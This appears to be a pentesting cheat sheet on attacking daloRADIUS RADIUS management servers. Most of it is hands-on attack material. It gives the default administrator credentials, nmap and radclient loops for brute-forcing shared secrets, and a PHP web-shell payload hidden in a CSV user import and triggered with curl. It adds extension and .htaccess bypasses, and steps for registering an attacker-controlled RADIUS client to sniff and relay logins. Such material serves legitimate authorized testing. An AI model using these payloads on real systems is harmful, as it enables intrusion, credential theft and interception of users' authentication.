DaloRADIUS
RADIUS web platform aimed at managing Hotspots and general-purpose ISP deployments
Remote Authentication Dial-In User Service (RADIUS)
is a networking protocol that provides centralized authentication, authorization, and accounting (AAA) management for users who connect and use a network service.
Port
:UDP/1812
(authentication),UDP/1813
(accounting)Default Credentials
: Often uses a shared secret between the client and server.
Enumeration
Login Pages
โ app/users/login.php
and /app/operators/login.php
Default credentials
โ administrator:radius
Brute-forcing RADIUS shared secret
Nmap radius-brute script
nmap -sU -p 1812 --script radius-brute <target>
nmap -sU -p 1812 --script radius-brute --script-args radius-brute.creds=secrets.txt <TARGET_IP>
radclient
for secret in $(cat secrets.txt); do echo "User-Name=test" | radclient -x <TARGET_IP> auth "$secret" 2>&1 | grep -q "Received Access-Accept" && echo "[+] Valid Secret Found: $secret" && break; done
echo "User-Name=test" | radclient -x <IP> auth <shared_secret>
RCE via File Upload
Log in to the admin panel.
Navigate to:
Config โ Import Users
Craft a Malicious
CSV
:
username,password
<?php system($_GET['cmd']); ?>,p4ss
Upload the File:
http://<target>/daloradius/library/shell.php.csv
Trigger
RCE
:
curl "http://<target>/daloradius/library/shell.php.csv?cmd=id"
If PHP Doesnโt Execute
Try double extensions โ
shell.php%00.csv
Try to use
.htaccess
bypass if is running inApache
.Check for
local file inclusion
vulnerabilities to include the uploaded file.
Modify RADIUS clients to intercept authentication requests
Navigate to
Management โ RADIUS Clients โ Add Client
Enter attacker-controlled server as a client:
Client IP/Hostname: <YOUR_ATTACKER_IP>
Secret: hacking123 # Shared secret for interception
On your attacker machine run:
# Use radsniff (from FreeRADIUS) to capture requests
radsniff -i eth0 -s hacking123 udp port 1812
Relay or Modify Requests (
MitM
)
echo "User-Name=victim" | radclient -x <REAL_RADIUS_IP> auth hacking123
Last updated